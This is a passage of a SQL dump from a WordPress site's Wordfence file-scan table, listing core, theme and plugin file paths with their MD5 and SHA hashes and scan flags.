(0x5a3993b6d37d2ed2c24aa4c26b0b3daa, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P1p1.php', 1, 0x00000000000000000000000000000000, 0x3849a2e3b61a080503070a0ed9d3a391, 0x691b3e7a1292bd0e90529340af11c5f2e1c2e36bf45790e036759a6bd579880e, '', 0, '?'),
(0x5a44e1b0073a2d68d0247be38d6d61cf, 'wp-content/plugins/wordfence/images/sort_desc.png', 1, 0x00000000000000000000000000000000, 0x1fc418e33fd5a687290258b23fac4e98, 0x0462c645d49ae7428a233ac228b223ee3d5f28c5041a809fda7ca08b55e623c4, '', 0, '?'),
(0x5a5bb78366802fec7da4f562c449e227, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/periscopemoney.svg', 0, 0xa49ce1482ebc6c8bf48281842a9064a7, 0xa49ce1482ebc6c8bf48281842a9064a7, 0xfe8bf73410b10e0c9bfcc60df29f2db3ba895f22cf3b974f41cb78aa5f501b11, '', 0, '?'),
(0x5a7888ff31a1324bd35aa42cb8ec177f, 'wp-includes/customize/class-wp-customize-header-image-control.php', 1, 0x00000000000000000000000000000000, 0xe5f962ad034eb1f2b88a49b2e55d77c9, 0x5f319f9fc070f69a6ff09944c3ff62a069d6dd8c65f4d516dce53a2b54c5f4eb, '', 0, '?'),
(0x5a7fd28c07a35bbcf80a76e2cbe20946, 'wp-includes/SimplePie/gzdecode.php', 1, 0x00000000000000000000000000000000, 0xc538e2bc0e866197db616c17841134d4, 0x1a123933d2d3451c759966008d96e42fdc5c54821e6b03269804d26f9419df48, '', 0, '?'),
(0x5a80248f83883caa9f7a13baa6f31622, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/briefcase.svg', 0, 0x3751ed214dc29acf45f276cdb9df2b40, 0x3751ed214dc29acf45f276cdb9df2b40, 0x82f824497672a3cee547e1b2e532c1bc65bac53290260a1b539dd0ec35680c3b, '', 0, '?'),
(0x5a9077811416d1d9cba93edcd2f70ecf, 'wp-content/plugins/revslider/admin/assets/js/codemirror/util/overlay.js', 0, 0x240c5026842d9bce7fbdf4abc6088a6a, 0x240c5026842d9bce7fbdf4abc6088a6a, 0xda4944ef15cccbd61363ed5af9ea3780104d0d38d593841bbf91b873c9964434, '', 0, '?'),
(0x5a985f228cea7eb44acfc08f1bc9e4e4, 'wp-includes/js/wp-custom-header.min.js', 1, 0x00000000000000000000000000000000, 0x95b069cef80307604eb843676b41da51, 0x33247b93eb6ef4f80b936743e4a0d95e24475472a997914c190c51e46513ef52, '', 0, '?'),
(0x5a9a314abcc168a0861d98df65b3e573, 'wp-content/themes/Impreza/framework/templates/author.php', 0, 0x4532c54df00e5fca3410cbc98b860454, 0x4532c54df00e5fca3410cbc98b860454, 0x7141fb97f69f79c5e95b2af8d8cbf9c4d45515d9e5d9856f928e4660e5cc0b4c, '', 0, '?'),
(0x5a9dcf54308c8e86f5f53e074a005cda, 'wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_Image_Single.php', 0, 0x16f3e29287022b9a80c1d02aca6e4b1e, 0x16f3e29287022b9a80c1d02aca6e4b1e, 0x42947e31f411d56bc09eaaec7f92776fddf7e260bea86e0ad2694fa60b267e48, '', 0, '?'),
(0x5aa3b0d18ff484fbdd92af05ba5308a5, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php', 1, 0x00000000000000000000000000000000, 0x6cf3bf8c1a5e035a924847b325a94fa3, 0x896da4bb9f63b43bf21d0a0579e390b2c8c5302cc60235ff8bd9467c3d1fc843, '', 0, '?'),
(0x5aac8dcae8c420252fbb5abf7a39fdec, 'wp-admin/includes/taxonomy.php', 1, 0x00000000000000000000000000000000, 0x5646a392c54514860e210a7091372870, 0xc8498fa5f4302c2cbb38fd3db446447879b7d6a029c2ab612f4c8fe547edad6d, '', 0, '?'),
(0x5ab1001e839c5988b392b320c3a66667, 'wp-includes/js/crop/marqueeVert.gif', 1, 0x00000000000000000000000000000000, 0xae9accf100a4b9930639adff52d4dcc7, 0x100c4baa63671e24a365c11bb28a325c70c824e0317aa58e90999c60436b4ac6, '', 0, '?'),
(0x5ad558aabc1d7e16b9e6d43a89516a73, 'wp-content/plugins/revslider/admin/assets/js/codemirror/util/runmode-standalone.js', 0, 0xa0efd2e9f150da30457624a3f7067947, 0xa0efd2e9f150da30457624a3f7067947, 0xce165aee8bf94f198440f16300b6683fa14da8ca72b15ed2df07fd8844accc18, '', 0, '?'),
(0x5ae2dba0318f5e07f9ae31510eaa5b9e, 'wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js', 0, 0xca76ed89028db5cd6168c19a4fce1752, 0xca76ed89028db5cd6168c19a4fce1752, 0xb7f17bc65ffccf1d8c77e5e13d7f3bfa136b77a4795990547890c69948a078aa, '', 0, '?'),
(0x5ae852a7d2cc7228f02662b0a33ab82d, 'wp-includes/css/dist/format-library/style-rtl.css', 1, 0x00000000000000000000000000000000, 0xe083f88ed372b2060f14fba501cfabc3, 0xeb4500f8276fbcd2b4a754cecb209f638ddf9d469e212b0b3f028090b7abb636, '', 0, '?'),
(0x5ae9ce3dd3a7c5720f1f6322b29479ae, 'wp-includes/IXR/class-IXR-date.php', 1, 0x00000000000000000000000000000000, 0x49eeca065664422b0341b74a3f83f923, 0x8717e17b7e9f2823e5a61a36759eeef0a1da2c8cea10d5c73f806a6b32edf160, '', 0, '?'),
(0x5b12f5bf66e4c8b29a5ec786c3cb703a, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_car_wash_24px.svg', 0, 0xe8cf564524bb7d461f2d133f587584e3, 0xe8cf564524bb7d461f2d133f587584e3, 0xb3161ff2ee76515098c14851235ffaad29a2d3c5e35bfe8445a90eec8ff49991, '', 0, '?'),
(0x5b1fd174ae49b485e970cad370ce5c60, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_5_24px.svg', 0, 0xc2c86bd1ea2747b5d80d35f2e3cdaadb, 0xc2c86bd1ea2747b5d80d35f2e3cdaadb, 0x6e13b6567f8272459f59034de0ac31be306fc4a30baed375b5be9772ce136226, '', 0, '?'),
(0x5b34f9696b80470f8651084309165020, 'wp-content/plugins/js_composer/include/autoload/vendors/jwplayer.php', 0, 0xab365a759177b70889724c211ed42e10, 0xab365a759177b70889724c211ed42e10, 0xa4f9a9d39caeacb1c17c115a8b35c5bb7e94e9d8da6a173888460ace09b78e65, '', 0, '?'),
(0x5b35f99ad759d94e68a6ab8a4b884de8, 'wp-includes/customize/class-wp-widget-area-customize-control.php', 1, 0x00000000000000000000000000000000, 0x931675e7cdb90f973773fb7199acb2b0, 0x3c90f076a08de1447e81259612e7ba9981a7c5e806ceef0fd817583c0cffcad4, '', 0, '?'),
(0x5b4566793ecce2e82e0a073e38af3266, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/select.php', 0, 0x800b82c2b362ff11ce881008b04b4027, 0x800b82c2b362ff11ce881008b04b4027, 0xc544fc27b894527eaab6afd931bc0f3486a7f5e3a66ecbde1b6992237ca48fa9, '', 0, '?'),
(0x5b61bb49f75e05117360862f909a0cdc, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_charging_20_24px.svg', 0, 0xdcb35d59a5b4312bbc3424d33c5bbd5c, 0xdcb35d59a5b4312bbc3424d33c5bbd5c, 0xad99337d3c5f0687c42ef68f5e976a2366fac377809c42e15fef08a818ce4f6a, '', 0, '?'),
(0x5b6ce12f55902e864fdd8f45827c3d6d, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/smartphone-gears.svg', 0, 0xe3868f6ff18fe4e355d0b48d3c88f443, 0xe3868f6ff18fe4e355d0b48d3c88f443, 0xf07a343ea4d2c0a46e1d48ba030d082103aec335e7acba1b71c42ead589af7f9, '', 0, '?'),
(0x5b8cc323dca7151a3e5dbf1e02813ca6, 'wp-admin/css/colors/ectoplasm/colors.min.css', 1, 0x00000000000000000000000000000000, 0x72046a12cb11f7721bcb3a628cb980a1, 0x68bc416df6e4eaa213788ffdddd3e34c959d27626221fd7cd5c9ee4d88f70bbf, '', 0, '?'),
(0x5b923e9578823b14f2776e122f748d48, 'wp-includes/js/wp-emoji.min.js', 1, 0x00000000000000000000000000000000, 0xa98b282dc6d835e7c63db94f2bc15a38, 0x21b7631bb55e3c13ffa2855140a024985d63b46543aafc164ffd0a5e4feb4e68, '', 0, '?'),
(0x5ba2c24f09c5c8929f23da5521dea5e8, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-es_ES.po', 1, 0x00000000000000000000000000000000, 0x1d573c036a73261d8752e04e4e948089, 0x620f0c06f01cb313bf478c9b71226be63bc06741a4205ff61751a0fe45d75e13, '', 0, '?'),
(0x5bb180e031190701b65941646bf6172c, 'wp-includes/SimplePie/Sanitize.php', 1, 0x00000000000000000000000000000000, 0x42d8b8c0cf46b5d8a511e0ae48b88f75, 0x05c94484d53ed7ce992bcb4eb91a9c46980ec77c2334936d3dd6faf3f5396375, '', 0, '?'),
(0x5bc559c1d03434f34f72b6956c0230cd, 'wp-includes/Requests/Exception/HTTP/414.php', 1, 0x00000000000000000000000000000000, 0xbca65d55e2409ef6a5291ed8e6a12368, 0xa58d48e0c17fbbd4ccc6da699ee0ed8d63f721a79949292e656888b591afb789, '', 0, '?'),
(0x5bea3b27d45f43766a7eaca73f1e5055, 'wp-content/plugins/Ultimate_VC_Addons/admin/bsf-core/index.php', 0, 0x4fc8d999a6afc9c03aa900c504a1fada, 0x4fc8d999a6afc9c03aa900c504a1fada, 0x7f128959fc24ef0fb209731b1cc0230ff8e179f29101f009877a7b659a9da9ce, '', 0, '?'),
(0x5beaa08fe67c4bf26f0ecadb8c6237f0, 'wp-admin/user/index.php', 1, 0x00000000000000000000000000000000, 0xc8fd98f7fdd52d78bdadf74e620789fa, 0xddb94ddc5a7fd1582a6810b00505baf056e00067eac0136321ebc32b35832335, '', 0, '?'),
(0x5bf29093a6653562162542c417303419, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/grid_builder.php', 0, 0xc8063753a63d83f5301b97cc275649fd, 0xc8063753a63d83f5301b97cc275649fd, 0xc788741219d61ba5e9eb7390070e504d74ec2ccccd5175d7c282e9e1d244503c, '', 0, '?'),
(0x5c16dcdc0e0f85958c398783b7c8ccf7, 'wp-admin/ms-upgrade-network.php', 1, 0x00000000000000000000000000000000, 0x3a39b7da5913c047aed3b88e58e177bf, 0x511fb289e0af7ba34fe81382c2e51dbac1a8824a7b534ed11f2de80328a374e7, '', 0, '?'),
(0x5c18174c0ef4db95c3940dd9210f3717, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_contact_mail_24px.svg', 0, 0xba93cb735bdf71f94319e39293e5cecf, 0xba93cb735bdf71f94319e39293e5cecf, 0x69f1988981139eb2840e632a4f6a2b482761f64870a59915f9af0464441bd58a, '', 0, '?'),
(0x5c48a2fb963a94a2751033e0258b4677, 'wp-content/plugins/wordfence/views/waf/waf-install-success.php', 1, 0x00000000000000000000000000000000, 0xea7b72861d84a7a3625e95e9db3f1697, 0xa7ce2f1bbcde5c32b6d608436507bb909e1e4c2bab9dd23af77085efaaecb75a, '', 0, '?'),
(0x5c523a0ffcfbeaaf067407cd3c572ade, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_round_chart.php', 0, 0x79c9ee2eb851024fba411fa6476b35e6, 0x79c9ee2eb851024fba411fa6476b35e6, 0xfdf26854b2729e63908c56858864a69f54b5f129d52f5c77f2305cf5f8dd521e, '', 0, '?'),
(0x5c5be6ed6925cdb03cfa98651e933ea9, 'wp-includes/css/wp-pointer-rtl.css', 1, 0x00000000000000000000000000000000, 0xb8f963b6af881302043b3170e8ad78bb, 0xf5d843a21bf3718f9bad86b2f300b0b631ee833f0de2ef996ae1aa2231fe013d, '', 0, '?'),
(0x5c73e3563e2705e929438c731cd3d8c8, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_fullscreen_24px.svg', 0, 0xdcfcec2791eb03b50fd4212e4c7c2ab1, 0xdcfcec2791eb03b50fd4212e4c7c2ab1, 0xd4b93f655cc0ad0d0348c8942312cfde0ed7d86b0b218d76996a81ad5e7a8f2b, '', 0, '?'),
(0x5c77a5597c654973213ebbe769a2e71f, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_subject_24px.svg', 0, 0xca0cdf1b73166bb727d18d33ef23189c, 0xca0cdf1b73166bb727d18d33ef23189c, 0x7b509dfc7f07cb2bc51f5ce8b49cc94307521d4c376ddab9984f2c6e986d18e3, '', 0, '?'),
(0x5c91aeede0c605a437f6ee16b251806f, 'wp-content/plugins/wordfence/css/images/ui-icons_cc0000_256x240.png', 1, 0x00000000000000000000000000000000, 0x7c81a6253b77a9fdaf51bb1038f8c840, 0x771e693ede36b7c6ace034c8e5a02e4eca43b9e4119e1aff34aa0e08494f9ed9, '', 0, '?'),
(0x5c9ad182923f241880cd8438c092a1e6, 'wp-admin/includes/dashboard.php', 1, 0x00000000000000000000000000000000, 0xaaa03741d0b4734658673a60d1431831, 0xb857a66072f54367d80786c7e37c1e9771feb9b98e426d3f5cf046886554610f, '', 0, '?'),
(0x5cad83c8cffac753ee8ae95387467a49, 'wp-content/themes/Impreza/functions/migrations/us_migration_4_2.php', 0, 0x4b4c776a7b5280a688c5804164b7eedb, 0x4b4c776a7b5280a688c5804164b7eedb, 0x8f407dd815ceaad19aa1247f4788bacf83b4753dd67bb0d73a3deef225b0708c, '', 0, '?'),
(0x5cd3000bf5a33ea62ba2b3c14662d0ed, 'wp-admin/revision.php', 1, 0x00000000000000000000000000000000, 0x949af2740665f4b2d7d3b19ba8a987d3, 0xa28221c9e490131f886ac22ef4ccfae841593788b90f42744ffc9769306dec71, '', 0, '?'),
(0x5ce83fa8edd2c493faf79f9b96ba7a9b, 'wp-content/themes/Impreza/config/migrations.php', 0, 0xf577c2efcfe0cb68291944c848d85ccd, 0xf577c2efcfe0cb68291944c848d85ccd, 0xe008a20e289f3633f012c8e2492ed3e22db905429b6275d206802b73681b745a, '', 0, '?'),
(0x5cff46bd0f5c4539aa34f48a572be7ad, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_airline_seat_legroom_normal_24px.svg', 0, 0x2646716998ca698fccd083b6af7538ac, 0x2646716998ca698fccd083b6af7538ac, 0x126009a9a10a73989f0746b0ded83a310163b5b571cd2ae9dbf173b0c000f575, '', 0, '?'),
(0x5d2852aa262110e2c6313b993398ea12, 'wp-includes/js/wp-ajax-response.js', 1, 0x00000000000000000000000000000000, 0xf1eb3b28419b46bc4d93f760e543167d, 0x7edcad1fdde628dc819687cd1c0ce39e63afd03c6872136181fb3f905e220945, '', 0, '?'),
(0x5d34880cd4b92df3dc36f5f18b24dc22, 'wp-content/plugins/js_composer/config/grids/shortcode-vc-masonry-grid.php', 0, 0xc6807c5b62947123d954abd823a15887, 0xc6807c5b62947123d954abd823a15887, 0xdcc210e4f54e02e75b2f0a8d39b07dca87580bc5015c7a4cf8483a7673a4e035, '', 0, '?'),
(0x5d3531b7e4a0f92614afdd0a20709a02, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_link_24px.svg', 0, 0xb060f37404ecad879591b0fd4af12ff4, 0xb060f37404ecad879591b0fd4af12ff4, 0x166dd816da2ee71e3c59198ef43fcccd3fa66e881a606afd087883d5688315b0, '', 0, '?'),
(0x5d422305cd32e87adaecfa62559cc92f, 'wp-includes/Text/Diff.php', 1, 0x00000000000000000000000000000000, 0x6c70d59e9e9a6e9bd11537719313e32a, 0xdc37c6e509bc69eb48ea9793e7e54d3208dcfc3333187daf20451280d2888ef6, '', 0, '?'),
(0x5d4c30baf205ec6545932275c020ad8b, 'wp-includes/js/mediaelement/mediaelement-migrate.min.js', 1, 0x00000000000000000000000000000000, 0x52bec302d465dd23422d9986af7bfa3a, 0x97618149b7e291267fbc8743cf5898f4c65c193be2a984e7e206f60a4388253b, '', 0, '?'),
(0x5d4d1d16cc95874730a7b3d8d75f0d06, 'wp-content/plugins/js_composer/config/deprecated/shortcode-vc-button.php', 0, 0xda395bb0207c0c96605e2b6f36cb3afa, 0xda395bb0207c0c96605e2b6f36cb3afa, 0x0f222840376a75b2140df5f0cc558deb450a94a23f2537de338eda1bd5a3c1da, '', 0, '?'),
(0x5d7379a3aa808de951bef98a2dd73c68, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_hdr_24px.svg', 0, 0x17d3441d700029fafc5bf0598f1e0ee9, 0x17d3441d700029fafc5bf0598f1e0ee9, 0x4589e985b22e7e49012f80744bc7d7d2e6de96bfb74495995879cbd1e6087b45, '', 0, '?'),
(0x5d838ad44ece0bd74a6ad38e65bda382, 'wp-includes/widgets/class-wp-widget-media.php', 1, 0x00000000000000000000000000000000, 0x18d05e6e02243eb5faf75e14e27f3323, 0x1261ef3db6e2e0ef82f40c4af2b76da9826328de6192829e8672be783a24e6cd, '', 0, '?'),
(0x5d8e81d472993a400c7f16b4854911a6, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Enterprise.php', 1, 0x00000000000000000000000000000000, 0x84a185363a94f5f6be326b5033faaebc, 0x257588b8814d70f1dae1c92c2e00d140b25a718c0beb7218bf9d2fc3fbb59f51, '', 0, '?'),
(0x5d9a0c0aebf27279aba1c93605665909, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/folder-delete.svg', 0, 0xdf4e73ca2f5ecc02130d95c9597dd8f4, 0xdf4e73ca2f5ecc02130d95c9597dd8f4, 0x77bdf3ba5b683800ac2a4c0934fea589270d0492416e96844fbd162eba3d2ec1, '', 0, '?'),
(0x5da5821650b7bfee546b76748aba3841, 'wp-admin/network/menu.php', 1, 0x00000000000000000000000000000000, 0x6991c325d77021cda49bd3befec88cdc, 0x754314ee334591845039f8497866af177646bf4be279406c92c430501438b16f, '', 0, '?'),
(0x5da5a4ca2a85a48f0c85ff038f4a0b96, 'wp-content/plugins/wordfence/images/icons/email_go.png', 1, 0x00000000000000000000000000000000, 0xbaaa6accd945fcb4480b29ab2e15bded, 0xf7bd2620f47143315155b45f2e4fd8ee0433bfc2cbf2312126d0e797dbb4aafb, '', 0, '?'),
(0x5da79f8be2f9227d5b1d921759dc52da, 'wp-admin/css/edit-rtl.css', 1, 0x00000000000000000000000000000000, 0x9aa9e8812ca07ae32b1a696c9eeb8f9b, 0xb824cea51e9718c21a24b1038d260c11dc40eb1287a5f5e222f7bcb87dce3b29, '', 0, '?'),
(0x5dce411195fe3f3c0c91a68717defede, 'wp-content/plugins/revslider/public/assets/assets/svg/toggle/ic_check_box_24px.svg', 0, 0x88071419c2e7523839a5071f001d1576, 0x88071419c2e7523839a5071f001d1576, 0xc9e36ebbdf881cc1549ec8635146912fbfe1594fcae4ffe1cdce9947ebc491b9, '', 0, '?'),
(0x5de84932079f201c0608e8a6223fc021, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_rss.php', 0, 0x10f015c1e8b0c63104e7c7ddb81a465f, 0x10f015c1e8b0c63104e7c7ddb81a465f, 0x3afb2a9f29f9cca228e0873a426800087320c98bc405b925a8370ac6fb4f6b59, '', 0, '?'),
(0x5e04913401ee6abe11167ca4e14983d0, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/OutOfQueriesException.php', 1, 0x00000000000000000000000000000000, 0x35f4fa482a66d2e424b0f0ca9d19d390, 0xfe03f211d0c69d6963df7ad9508ffb31e28d22dda2d39b6fb6545772798b2a46, '', 0, '?'),
(0x5e061200028476567e475bfb6f296b11, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/profile.svg', 0, 0xf42d333ecf1d56787548ef9640625c06, 0xf42d333ecf1d56787548ef9640625c06, 0x963efbc01dd60fe2f4a241487321991950fcb499a86747bfb1f000a03e141973, '', 0, '?'),
(0x5e2962cc8f0f2e63b3cf40e91f3cb844, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-data.svg', 0, 0x4cdb81f0b64896b537e511220f6030e7, 0x4cdb81f0b64896b537e511220f6030e7, 0x75617e0b73151090e79d0f3f00516d7bda04486b735f2f43f9e1c5a1405f9a6a, '', 0, '?'),
(0x5e39282d28c5b2c5792089f7ca30712a, 'wp-admin/user/about.php', 1, 0x00000000000000000000000000000000, 0x99ec00da8d914b4efd2098a3e44ebe2d, 0xbb678f52a10a1803117a853fcbd3393f599ca18d8f7febcb20e362dd8266cd97, '', 0, '?');
INSERT INTO `zdenl_wffilemods` (`filenameMD5`, `filename`, `knownFile`, `oldMD5`, `newMD5`, `SHAC`, `stoppedOnSignature`, `stoppedOnPosition`, `isSafeFile`) VALUES
(0x5e40d5b2017b27aba95fe8e2079b3932, 'wp-admin/upgrade-functions.php', 1, 0x00000000000000000000000000000000, 0x2ce9edafd62960bf82b855da79f562d1, 0x0d7fca39317c2651526c1ad4bcf0b7a09d341c593b3c480c2c3d91456c8d2097, '', 0, '?'),
(0x5e4800f5427cdbd83419db407a07c1f7, 'wp-includes/IXR/class-IXR-error.php', 1, 0x00000000000000000000000000000000, 0x673622ac95ed755c2733bcb2ad9c628a, 0x2a3fcddba7558f3d8e3fa82c5da4da303d43caf89393a05a2d863644712e9847, '', 0, '?'),
(0x5e55f09c2e69bed67970471fc203b699, 'wp-includes/js/mediaelement/mediaelementplayer-legacy.css', 1, 0x00000000000000000000000000000000, 0x9d0ee441d256fd74d046c6a3b6188996, 0xa032c8717b59c22a6c58f8065b719d6b649396e17dce4a70ea99e4e00fd305b6, '', 0, '?'),
(0x5e56f1c1c8f7b6e4829821b785a54941, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_help_outline_24px.svg', 0, 0xd83527403c4a767d97a4af02bed83fc1, 0xd83527403c4a767d97a4af02bed83fc1, 0x74d5bd4a08e462ea877d46dfc60145ffaafaff9a8594aa7479639c29c4e378fe, '', 0, '?'),
(0x5e6a49d147ceb274aa80bbc41019fd84, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_walk_24px.svg', 0, 0xcbfa518304ec1f6fd8ff4cf66d69f22d, 0xcbfa518304ec1f6fd8ff4cf66d69f22d, 0x979c462cdbc1c94fd43af3bc188e13036328e72b478cced2c1ada603c19c720f, '', 0, '?'),
(0x5e79473dda9c4667073b330591c3a1a9, 'wp-content/plugins/wordfence/images/button-grad-grey.png', 1, 0x00000000000000000000000000000000, 0x95c45243ec1d1cbfca547908d5fd3fde, 0x44defa80c3c108d648d97eb592b49d057f1fcfa8a250ba5fe1a77b8d21cad702, '', 0, '?'),
(0x5e7fe583c390aff088af2b85797cd008, 'wp-includes/images/crystal/spreadsheet.png', 1, 0x00000000000000000000000000000000, 0x358639f8d0a20c318054cb01c76ea4ea, 0x650d43ac886930e3d75bafea52ac38400106e6f7f01ccd4792a5f0614a4e08cd, '', 0, '?'),
(0x5e8a81d095bbd1eb89b397076d788ccd, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_meta.php', 0, 0x80dfc54306a54eca77bd94ebb10c941e, 0x80dfc54306a54eca77bd94ebb10c941e, 0x31c8e5b5db4927bef6a0fd010b2da08609b0901fec50504b3c668eeb3472db52, '', 0, '?'),
(0x5ea8f1411506a3b78df399adaf341912, 'wp-content/plugins/Ultimate_VC_Addons/assets/js/teams.js', 0, 0x71e30d32ad8ac0396e1bded24d2f836a, 0x71e30d32ad8ac0396e1bded24d2f836a, 0x03cf251a98631f5b8e568954b4064f24d1e78576890d453f68c0044f527a6254, '', 0, '?'),
(0x5eb842e98bce55e3ea30a079b8207263, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_grain_24px.svg', 0, 0x75b1b7043861a3a4fc46027c14d691e5, 0x75b1b7043861a3a4fc46027c14d691e5, 0xb2caad790b3ee3920e5694a9dcc7051b79de6fbda53880102fbec8c176edf63c, '', 0, '?'),
(0x5ed45596960ec67c66485e6becf45cbd, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/lamp.svg', 0, 0x14ef8c3f3b230cd020ec701ea7c3a10c, 0x14ef8c3f3b230cd020ec701ea7c3a10c, 0x1030c32751690281ba8499cd7c63edc22fc8e097996a890c30d9285c12fddfa7, '', 0, '?'),
(0x5edc8565570f13ff8479fa140b7079a1, 'wp-content/plugins/Ultimate_VC_Addons/assets/js/modernizr-custom.js', 0, 0x17c4fb5b14d11fdb32126c23824f874e, 0x17c4fb5b14d11fdb32126c23824f874e, 0x37e13943a47648a8fc4cbbbc30ce5ff48f69ba11e256b16ea55b88171ab6f6b9, '', 0, '?'),
(0x5ee89a61ec06cdc544cc56309725b3da, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_zoom_in_24px.svg', 0, 0x12a3440c54790f9c7a389922aa1c530c, 0x12a3440c54790f9c7a389922aa1c530c, 0xd7dd1cd34a5e2e8f6bd45fa46776e962a6738d25b5b01d4adb7c0c4413851c1b, '', 0, '?'),
(0x5eeff95e5c0551f3c33d2877b210ee86, 'wp-includes/js/imagesloaded.min.js', 1, 0x00000000000000000000000000000000, 0x7e97ab52c3df75e9053002bb59f2cdd5, 0x7293219a976160aeef55a62a8c01f888dd31eaa977a430873f134f891cbf1bda, '', 0, '?'),
(0x5eff6f8b064f49e7187f24a60e21276f, 'wp-content/plugins/Ultimate_VC_Addons/admin/css/fonts/count-down-timer.svg', 0, 0xa2f82e09bd02231ac9fce6d79c31c7cc, 0xa2f82e09bd02231ac9fce6d79c31c7cc, 0x6cc4a1566bc9ad22e5fc1c2159592958bdd2ca9db40769913d737c179ec49eb9, '', 0, '?'),
(0x5f02b0000cdfc56420954d507edbeb44, 'wp-includes/revision.php', 1, 0x00000000000000000000000000000000, 0xa07853241b518c079375e8477adc58b7, 0x152504afde30904fb97cdde987310184cf8eca706e5795ad93e76a1286869d1f, '', 0, '?'),
(0x5f03a36b34e9f7b7212a7d8882dd8420, 'wp-content/plugins/wordfence/vendor/composer/ClassLoader.php', 1, 0x00000000000000000000000000000000, 0xa0899dd7d97c25fe1d872a542afa6081, 0x9890179892e4a1323804397601907533926e094332178d731dafbc760c612f9f, '', 0, '?'),
(0x5f12510cfffd758d6fd4ab58cb3b2704, 'wp-content/plugins/Ultimate_VC_Addons/templates/pricing/pricing-design06.php', 0, 0xe84d1d44c6788825916414ea86b17c76, 0xe84d1d44c6788825916414ea86b17c76, 0x1b1bf92d1241dc5065ee7b29a2af6a7b3c3eb09fc00b4e5ad79b78dea05be549, '', 0, '?'),
(0x5f1f2a05c4e2bd9e4c16ff30e23e070d, 'wp-includes/feed-rss2.php', 1, 0x00000000000000000000000000000000, 0x97fe3efe56322565a440ead86b46e436, 0x2f339db5e9b470c0a472943e5d4426fe0873594a9973ce97c2ac1f6f712b45ac, '', 0, '?'),
(0x5f1fcc23e88bf1553170fa4753f2b316, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SipHash.php', 1, 0x00000000000000000000000000000000, 0x015ab08ac57274bdc2fd77fac9289865, 0xa8d2bf4408dc493cf55ec8691c326457825d4719e25fe42d122b04854138f357, '', 0, '?'),
(0x5f264f20ef3edc548446e60ee332463e, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_network_locked_24px.svg', 0, 0x561df1e8de7c53ce20cd4c4fc69d7265, 0x561df1e8de7c53ce20cd4c4fc69d7265, 0x2d614b20c7d62f684a001114b785d0581f72af37705a80ce837a2311ba840cb0, '', 0, '?'),
(0x5f2cebe3539085cecf2924008d9990fd, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_chevron_left_24px.svg', 0, 0xce1003c3cdf2d5ab91720129beb8860b, 0xce1003c3cdf2d5ab91720129beb8860b, 0xf7c1f4cb5e5ed5827b3b4fd59dae748448fd6242b5aa424ffca85d55a7c40a76, '', 0, '?'),
(0x5f3ec8a5ec6b29fc958476d94913a34c, 'wp-content/plugins/Ultimate_VC_Addons/assets/js/froogaloop2-min.js', 0, 0xf74225e9e76e2fb44b4cf4f0dcf79d74, 0xf74225e9e76e2fb44b4cf4f0dcf79d74, 0x1bd194338f82ac4e305099ae35798c7d40d9aae5fbbae16231af706f34c9c241, '', 0, '?'),
(0x5f44e873ec449091a9648fc4f043aeee, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_tablet_mac_24px.svg', 0, 0x77bfcd2b646d1ab023aeea48557f4c83, 0x77bfcd2b646d1ab023aeea48557f4c83, 0x4bf414da39c73f62131c763f6f58ad6aefc87753085ab8aa5605817ace0dd338, '', 0, '?'),
(0x5f51ed41a508d014f03ded95d547769b, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_watch_later_24px.svg', 0, 0x9217441cd83b49419845c46afc3eb3df, 0x9217441cd83b49419845c46afc3eb3df, 0xe10c314850b48f7e51af48312a7d2e47a7887d09e50395c73185ec05de45d310, '', 0, '?'),
(0x5f5f6849bd640bcabfdea08e3f005629, 'wp-content/plugins/us-header-builder/templates/htemplates.php', 0, 0x2da33e795be91004de9d3eabe385466f, 0x2da33e795be91004de9d3eabe385466f, 0xe1cf8a7aa5dafbc15bd2208740f859713962cf555afbd5bc0cd4c0e916735182, '', 0, '?'),
(0x5f6a18f5f0875fb1a82fd4ccd679d3b1, 'wp-includes/load.php', 1, 0x00000000000000000000000000000000, 0xc979463c1cb7c94cbe59bcaf60ddc77f, 0xa6d24b0e2335580658e71b605da4b05d7acc36550b9fc2c118a043f8a5ab61ae, '', 0, '?'),
